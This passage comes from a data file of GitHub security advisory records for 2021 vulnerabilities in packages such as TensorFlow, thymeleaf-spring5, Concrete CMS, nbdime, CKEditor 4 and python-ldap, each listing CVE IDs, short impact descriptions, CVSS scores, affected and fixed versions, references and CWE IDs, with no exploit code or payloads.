+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7pxj-m4jf-r6h2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41203'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/368af875869a204b4ac552b9ddda59f6a46a56ec'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/abcced051cb1bd8fb05046ac3b6023a7ebcc4578'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/b619c6f865715ca3b15ef1842b5b95edbaa710ad'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e8dc63704c88007ee4713076605c90188d66f3d2'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-190', 'CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:46:25Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}"
+1.4.0,GHSA-qcj6-jqrg-4wp2,2021-11-18T15:13:02Z,2021-11-10T19:52:33Z,,['CVE-2021-43466'],Template injection in thymeleaf-spring5,"In the thymeleaf-spring5:3.0.12 component, thymeleaf combined with specific scenarios in template injection may lead to remote code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.thymeleaf:thymeleaf-spring5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.13.RELEASE'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.12.RELEASE'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43466'}, {'type': 'WEB', 'url': 'https://github.com/thymeleaf/thymeleaf-spring/issues/263#issuecomment-977199524'}, {'type': 'WEB', 'url': 'https://gitee.com/wayne_wwang/wayne_wwang/blob/master/2021/10/31/ruoyi+thymeleaf-rce/index.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/thymeleaf/thymeleaf-spring'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20221014-0001/'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.186365'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:12:25Z', 'nvd_published_at': '2021-11-09T12:15:00Z'}"
+1.4.0,GHSA-hf9p-9r39-r2h3,2021-11-02T18:39:03Z,2021-11-03T17:29:29Z,,['CVE-2020-11476'],Unrestricted Uploads in Concrete5,Concrete5 before 8.5.3 allows Unrestricted Upload of File with Dangerous Type such as a .phar file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/concrete5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11476'}, {'type': 'WEB', 'url': 'https://github.com/concrete5/concrete5/pull/8713'}, {'type': 'WEB', 'url': 'https://github.com/concretecms/concretecms/commit/d296f4ba4f6ad94b199c21c1b16f0d185adab343'}, {'type': 'PACKAGE', 'url': 'https://github.com/concrete5/concrete5'}, {'type': 'WEB', 'url': 'https://github.com/concrete5/concrete5/releases/tag/8.5.3'}, {'type': 'WEB', 'url': 'https://herolab.usd.de/security-advisories/usd-2020-0041/'}]","{'cwe_ids': ['CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-02T18:39:03Z', 'nvd_published_at': '2020-07-28T21:15:00Z'}"
+1.4.0,GHSA-26cm-qrc6-mfgj,2021-11-02T18:40:07Z,2021-11-08T18:16:21Z,,['CVE-2021-41232'],Improper Neutralization of Special Elements used in an LDAP Query in stevenweathers/thunderdome-planning-poker,"### Impact
+LDAP injection vulnerability, only affects instances with LDAP authentication enabled.
+
+### Patches
+Patch for vulnerability released with v1.16.3.
+
+### Workarounds
+Disable LDAP feature if in use
+
+### References
+[OWASP LDAP Injection Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html
+)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Thunderdome Github Repository](https://github.com/StevenWeathers/thunderdome-planning-poker)
+* Email us at [steven@weathers.me](mailto:steven@weathers.me)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/stevenweathers/thunderdome-planning-poker'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/StevenWeathers/thunderdome-planning-poker/security/advisories/GHSA-26cm-qrc6-mfgj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41232'}, {'type': 'WEB', 'url': 'https://github.com/github/securitylab/issues/464#issuecomment-957094994'}, {'type': 'WEB', 'url': 'https://github.com/StevenWeathers/thunderdome-planning-poker/commit/f1524d01e8a0f2d6c3db5461c742456c692dd8c1'}, {'type': 'PACKAGE', 'url': 'https://github.com/StevenWeathers/thunderdome-planning-poker'}]","{'cwe_ids': ['CWE-74', 'CWE-90'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-02T18:40:07Z', 'nvd_published_at': '2021-11-02T18:15:00Z'}"
+1.4.0,GHSA-x5jp-9fmm-m9pf,2021-11-17T21:11:15Z,2021-11-15T23:13:52Z,,['CVE-2021-3683'],showdoc is vulnerable to Cross-Site Request Forgery (CSRF),showdoc is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.9.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3683'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/67093c879a6563aa6ee08003177777d1975e2351'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/063a339a-5d78-40d6-a96a-6716960e8134'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T19:43:10Z', 'nvd_published_at': '2021-11-13T10:15:00Z'}"
+1.4.0,GHSA-p6rw-44q7-3fw4,2021-11-03T18:13:40Z,2021-11-08T18:09:27Z,,['CVE-2021-41134'],Stored XSS in Jupyter nbdime,"### Impact
+
+Improper handling of user controlled input caused a stored cross-site scripting (XSS) vulnerability. All previous versions of nbdime are affected.
+
+### Patches
+
+Security patches will be released for each of the major versions of the nbdime packages since version 1.x of the nbdime python package.
+
+#### Python
+- nbdime 1.x: Patched in v. 1.1.1
+- nbdime 2.x: Patched in v. 2.1.1
+- nbdime 3.x: Patched in v. 3.1.1
+
+#### npm
+- nbdime 6.x version: Patched in 6.1.2
+- nbdime 5.x version: Patched in 5.0.2
+- nbdime-jupyterlab 1.x version: Patched in 1.0.1
+- nbdime-jupyterlab 2.x version: Patched in 2.1.1
+
+### For more information
+If you have any questions or comments about this advisory email us at [security@ipython.org](mailto:security@ipython.org).
+
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'nbdime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'nbdime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'nbdime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'nbdime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'nbdime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'nbdime-jupyterlab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'nbdime-jupyterlab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jupyter/nbdime/security/advisories/GHSA-p6rw-44q7-3fw4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41134'}, {'type': 'WEB', 'url': 'https://github.com/jupyter/nbdime/commit/e44a5cc7677f24b45ebafc756db49058c2f750ea'}, {'type': 'PACKAGE', 'url': 'https://github.com/jupyter/nbdime'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T18:13:40Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}"
+1.4.0,GHSA-gf2c-93hm-r9j5,2021-11-22T18:42:37Z,2021-11-23T18:16:43Z,,['CVE-2021-3963'],Cross-site Scripting in kimai2,kimai2 is vulnerable to Cross-Site Request Forgery (CSRF) in deleting invoice templates. This vulnerability is capable of tricking admin user to delete invoice templates.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'kevinpapst/kimai2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3963'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/commit/95796ab2560ad93f44068a88f0fad758c2053514'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3abf308b-7dbd-4864-b1a9-5c45b876def8'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:42:37Z', 'nvd_published_at': '2021-11-19T12:15:00Z'}"
+1.4.0,GHSA-ppq7-88c7-q879,2021-11-17T22:34:48Z,2021-11-17T23:42:40Z,,['CVE-2021-25976'],Cross-Site Request Forgery in PiranhaCMS,"In PiranhaCMS, versions 4.0.0-alpha1 to 9.2.0 are vulnerable to cross-site request forgery (CSRF) when performing various actions supported by the management system, such as deleting a user, deleting a role, editing a post, deleting a media folder etc., when an ID is known.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Piranha'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-alpha1'}, {'fixed': '10.0-alpha1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.2.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25976'}, {'type': 'WEB', 'url': 'https://github.com/PiranhaCMS/piranha.core/commit/e42abacdd0dd880ce9cf6607efcc24646ac82eda'}, {'type': 'PACKAGE', 'url': 'https://github.com/PiranhaCMS/piranha.core'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25976'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T22:34:48Z', 'nvd_published_at': '2021-11-16T09:15:00Z'}"
+1.4.0,GHSA-6c7m-qwxj-mvhp,2021-11-24T19:01:48Z,2021-11-19T20:55:16Z,,['CVE-2021-41278'],Broken encryption in EdgeX Foundry,"### Summary
+Broken encryption in app-functions-sdk “AES” transform in EdgeX Foundry releases prior to Jakarta allows attackers to decrypt messages via unspecified vectors.
+
+### Detailed Description
+The app-functions-sdk exports an “aes” transform that user scripts can optionally call to encrypt data in the processing pipeline. No decrypt function is provided. Encryption is not enabled by default, but if used, the level of protection may be less than the user may expects due to a broken implementation in https://github.com/edgexfoundry/app-functions-sdk-go/blob/v1.0.0/pkg/transforms/encryption.go
+
+Version v2.1.0 (EdgeX Foundry Jakarta release and later) of app-functions-sdk-go/v2 deprecates the “aes” transform and provides an improved “aes256” transform in its place. The broken implementation will remain in a deprecated state until it is removed in the next EdgeX major release to avoid breakage of existing software that depends on the broken implementation.
+
+### Impact
+As the broken transform is a library function that is not invoked by default, users who do not use the AES transform in their processing pipelines are unaffected. Those that are affected are urged to upgrade to the Jakarta EdgeX release and modify processing pipelines to use the new ""aes256"" transform.
+
+#### Vulnerable go modules
+- github.com/edgexfoundry/app-functions-sdk-go < v2.1.0
+- github.com/edgexfoundry/app-functions-sdk-go/v2 < v2.1.0
+- github.com/edgexfoundry/app-service-configurable < v2.1.0
+
+#### Vulnerable containers
+- https://hub.docker.com/r/edgexfoundry/app-service-configurable >= 2.0.0 < v2.1.0
+- https://hub.docker.com/r/edgexfoundry/app-service-configurable-arm64 >= 2.0.0 < 2.1.0
+- https://hub.docker.com/r/edgexfoundry/docker-app-service-configurable < 2.0.0
+- https://hub.docker.com/r/edgexfoundry/docker-app-service-configurable-arm64 < 2.0.0
+
+#### Vulnerable Snaps
+- https://snapcraft.io/edgex-app-service-configurable >= 2.0.0 < 2.1.0
+
+### Patches
+Upgrade to 2.1.0 version of app-functions-sdk-go/v2, app-service-configurable, and related docker containers shown below and modify user scripts to use the new ""aes256"" transform in place of the existing ""aes"" transform.
+
+#### Patched go modules
+- github.com/edgexfoundry/app-functions-sdk-go/v2 v2.1.0
+- github.com/edgexfoundry/app-service-configurable v2.1.0
+
+Modification of user scripts is necessary for full remediation.
+
+#### Patched containers
+- https://hub.docker.com/r/edgexfoundry/app-service-configurable:>=2.1.0
+- https://hub.docker.com/r/edgexfoundry/app-service-configurable-arm64:>=2.1.0
+
+Modification of user scripts is necessary for full remediation.
+
+#### Patched Snaps
+- https://snapcraft.io/edgex-app-service-configurable >= 2.1.0
+
+Modification of user scripts is necessary for full remediation.
+
+### Workarounds
+If unable to upgrade, change the processing pipeline to use an HTTPS (TLS 1.3) endpoint to export and skip encryption.
+
+### References
+* [2.0 documentation](https://docs.edgexfoundry.org/2.0/microservices/application/BuiltIn/#aes)
+* [2.1 documentation](https://docs.edgexfoundry.org/2.1/microservices/application/BuiltIn/#encryption-deprecated)
+* [GitHub issue](https://github.com/edgexfoundry/app-functions-sdk-go/issues/968)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Contact us in the [Slack #security channel](https://slack.edgexfoundry.org/)
+* Open an issue in [edgex-go](https://github.com/edgexfoundry/edgex-go)
+* Email us at [EdgeX-TSC-Security@lists.edgexfoundry.org](mailto:EdgeX-TSC-Security@lists.edgexfoundry.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/edgexfoundry/app-functions-sdk-go/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/edgexfoundry/app-functions-sdk-go'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.1.0'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/edgexfoundry/app-service-configurable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/edgexfoundry/app-functions-sdk-go/security/advisories/GHSA-6c7m-qwxj-mvhp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41278'}, {'type': 'WEB', 'url': 'https://github.com/edgexfoundry/app-functions-sdk-go/commit/8fa13c6388ce76a6b878b54490eac61aa7d81165'}, {'type': 'PACKAGE', 'url': 'https://github.com/edgexfoundry/app-functions-sdk-go'}]","{'cwe_ids': ['CWE-327'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-18T23:05:06Z', 'nvd_published_at': '2021-11-19T00:15:00Z'}"
+1.4.0,GHSA-gqpw-9q54-9x28,2021-11-22T18:24:09Z,2021-11-23T18:18:43Z,,['CVE-2021-22970'],Server-Side Request Forgery in Concrete CMS,Concrete CMS (formerly concrete5) versions 8.5.6 and below and version 9.0.0 allow local IP importing causing the system to be vulnerable to SSRF attacks on the private LAN to servers by reading files from the local LAN. An attacker can pivot in the private LAN and exploit local network appsandb.,[],"[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22970'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1364797'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/857-release-notes'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/901-release-notes'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:24:09Z', 'nvd_published_at': '2021-11-19T19:15:00Z'}"
+1.4.0,GHSA-x24j-87x9-jvv5,2022-08-11T22:06:27Z,2021-11-03T17:34:22Z,,['CVE-2021-25973'],Publify `guest` role users can self-register even when the admin does not allow it,"In Publify, 9.0.0.pre1 to 9.2.4 are vulnerable to Improper Access Control. `guest` role users can self-register even when the admin does not allow it. This happens due to front-end restriction only.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'publify_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0.pre1'}, {'fixed': '9.2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25973'}, {'type': 'WEB', 'url': 'https://github.com/publify/publify/commit/3447e0241e921b65f6eb1090453d8ea73e98387e'}, {'type': 'PACKAGE', 'url': 'https://github.com/publify/publify/'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/publify_core/CVE-2021-25973.yml'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25973'}]","{'cwe_ids': ['CWE-285', 'CWE-669', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T14:44:37Z', 'nvd_published_at': '2021-11-02T07:15:00Z'}"
+1.4.0,GHSA-844m-cpr9-jcmh,2022-08-11T18:31:09Z,2021-11-15T17:54:01Z,,['CVE-2021-41263'],Rails Multisite secure/signed cookies share secrets between sites in a multi-site application,"### Impact
+This vulnerability impacts any Rails applications using `rails_multisite` alongside Rails' signed/encrypted cookies. Depending on how the application makes use of these cookies, it may be possible for an attacker to re-use cookies on different 'sites' within a multi-site Rails application.
+
+### Patches
+The issue has been patched in v4 of the `rails_multisite` gem. Note that this upgrade will invalidate all previous signed/encrypted cookies. The impact of this invalidation will vary based on the application architecture.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'rails_multisite'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/discourse/rails_multisite/security/advisories/GHSA-844m-cpr9-jcmh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41263'}, {'type': 'WEB', 'url': 'https://github.com/discourse/rails_multisite/commit/c6785cdb5c9277dd2c5ac8d55180dd1ece440ed0'}, {'type': 'PACKAGE', 'url': 'https://github.com/discourse/rails_multisite'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rails_multisite/CVE-2021-41263.yml'}]","{'cwe_ids': ['CWE-200', 'CWE-327', 'CWE-565'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T17:53:35Z', 'nvd_published_at': '2021-11-15T20:15:00Z'}"
+1.4.0,GHSA-v899-28g4-qmh8,2021-11-03T14:51:05Z,2021-11-01T19:19:54Z,,['CVE-2020-26705'],XML External Entity vulnerability in Easy-XML,The parseXML function in Easy-XML 0.5.0 was discovered to have a XML External Entity (XXE) vulnerability which allows for an attacker to expose sensitive data or perform a denial of service (DOS) via a crafted external entity entered into the XML content as input.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'easy-xml'}, 'ecosystem_specific': {'affected_functions': ['EasyXML.parseXML']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26705'}, {'type': 'WEB', 'url': 'https://github.com/darkfoxprime/python-easy_xml/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/darkfoxprime/python-easy_xml'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T19:12:25Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}"
+1.4.0,GHSA-r8wq-qrxc-hmcm,2021-11-26T18:26:27Z,2021-11-29T17:58:59Z,,[],ReDoS in LDAP schema parser,"https://github.com/python-ldap/python-ldap/issues/424
+
+### Impact
+The LDAP schema parser of python-ldap 3.3.1 and earlier are vulnerable to a regular expression denial-of-service attack. The issue affects clients that use ``ldap.schema`` package to parse LDAP schema definitions from an untrusted source.
+
+### Patches
+The upcoming release of python-ldap 3.4.0 will contain a workaround to prevent ReDoS attacks. The schema parser refuses schema definitions with an excessive amount of backslashes.
+
+### Workarounds
+As a workaround, users can check input for excessive amount of backslashes in schemas. More than a dozen backslashes per line are atypical.
+
+### References
+[CWE-1333](https://cwe.mitre.org/data/definitions/1333.html)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [python-ldap](https://github.com/python-ldap/python-ldap) tracker
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'python-ldap'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/python-ldap/python-ldap/security/advisories/GHSA-r8wq-qrxc-hmcm'}, {'type': 'WEB', 'url': 'https://github.com/python-ldap/python-ldap/issues/424'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-ldap/python-ldap'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-26T18:26:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7h26-63m7-qhf2,2022-02-08T20:39:10Z,2021-11-17T21:58:25Z,,['CVE-2021-41165'],HTML comments vulnerability allowing to execute JavaScript code,"### Affected packages
+The vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4.
+
+### Impact
+A potential vulnerability has been discovered in CKEditor 4 HTML processing core module. The vulnerability allowed to inject malformed comments HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at version < 4.17.0.
+
+### Patches
+The problem has been recognized and patched. The fix will be available in version 4.17.0.
+
+### For more information
+Email us at security@cksource.com if you have any questions or comments about this advisory.
+
+### Acknowledgements
+The CKEditor 4 team would like to thank William Bowling ([wbowling](https://github.com/wbowling)) for recognizing and reporting this vulnerability.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'ckeditor4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.17.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7h26-63m7-qhf2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41165'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor4'}, {'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-417'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2021-011'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T19:57:11Z', 'nvd_published_at': '2021-11-17T20:15:00Z'}"
+1.4.0,GHSA-mjww-934m-h4jw,2022-09-01T20:13:29Z,2021-11-19T20:19:53Z,,['CVE-2020-29457'],Improper Certificate Validation in OPCFoundation.NetStandard.Opc.Ua.Core,A Privilege Elevation vulnerability in OPC UA .NET Standard Stack 1.4.363.107 allows attackers to establish a connection using invalid certificates.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'OPCFoundation.NetStandard.Opc.Ua.Core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.365.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.365.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29457'}, {'type': 'WEB', 'url': 'https://github.com/OPCFoundation/UA-.NETStandard/pull/1229'}, {'type': 'WEB', 'url': 'https://github.com/OPCFoundation/UA-.NETStandard/pull/1229/commits/d815cfb972bd668c1b6e461f6ff97519d6b26f25'}, {'type': 'PACKAGE', 'url': 'https://github.com/OPCFoundation/UA-.NETStandard/'}, {'type': 'WEB', 'url': 'https://opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2020-29457.pdf'}, {'type': 'WEB', 'url': 